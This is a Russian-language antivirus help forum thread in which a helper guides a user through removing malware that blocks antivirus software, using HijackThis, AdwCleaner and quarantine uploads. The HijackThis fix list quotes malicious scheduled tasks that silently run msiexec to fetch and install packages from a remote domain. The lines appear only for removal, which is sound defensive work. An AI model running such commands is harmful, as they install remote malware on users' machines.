Перейти к содержанию

Вирус блокирует антивирусы


Рекомендуемые сообщения

При попытке зайти на сайт с антивирусом или запустить антивирус последний зависает,запустить антивирус получается только с безопасного режима.

P.S. Сборщик логов был запущен также с безопасного режима

Ссылка на сообщение
Поделиться на другие сайты

1) "Пофиксите" в HijackThis:

O4 - MSConfig\startupreg: MAgent [command] = C:\Users\Павел\AppData\Roaming\Mail.Ru\Agent\magent.exe -CU (HKCU) (2017/05/29) (file missing)
O4 - MSConfig\startupreg: McAfeeSafeConnect [command] = C:\Program Files (x86)\McAfee Safe Connect\McAfee Safe Connect.exe (HKCU) (2018/09/28) (file missing)
O4 - MSConfig\startupreg: NvBackend [command] = C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (HKLM) (2016/07/20) (file missing)
O9 - Button: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523}: Mail.Ru Агент - C:\Users\Павел\AppData\Roaming\Mail.Ru\Agent\magent.exe (file missing)
O9 - Tools menu item: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523}: Mail.Ru Агент - C:\Users\Павел\AppData\Roaming\Mail.Ru\Agent\magent.exe (file missing)
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: {2549D24C-FA36-EC6E-7FA4-AC7C60EFE249} - C:\Windows\system32\msiexec.exe -package https://sensernyteg.com/kgk86cbc8hzn.flv /q
O22 - Task: {59876794-EFF0-5CB2-F3E9-787A3630FAE4} - C:\Windows\system32\msiexec.exe /q -package https://sensernyteg.com/xidhctahwktt.nwl

 

2) - Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.
 

3) Удалите остатки от McAfee.

 

4) Соберите свежие логи.

Ссылка на сообщение
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O4 - MSConfig\startupreg: McAfeeSafeConnect [command] = C:\Program Files (x86)\McAfee Safe Connect\McAfee Safe Connect.exe (HKCU) (2018/09/28) (file missing)
O4 - MSConfig\startupreg: win_en_77 [command] = (HKLM) (2016/07/20) (no file)

 

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

Прошло уже больше 2 часов,а сообщение все тоже..Отчет по Вашему карантину еще не сформирован. Обычно анализ занимает 20 минут.

AdwCleanerS05.txt

Ссылка на сообщение
Поделиться на другие сайты

 

AdwCleaner[C03].txt

покажите и проверьте, что с проблемой.

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
×
  • Создать...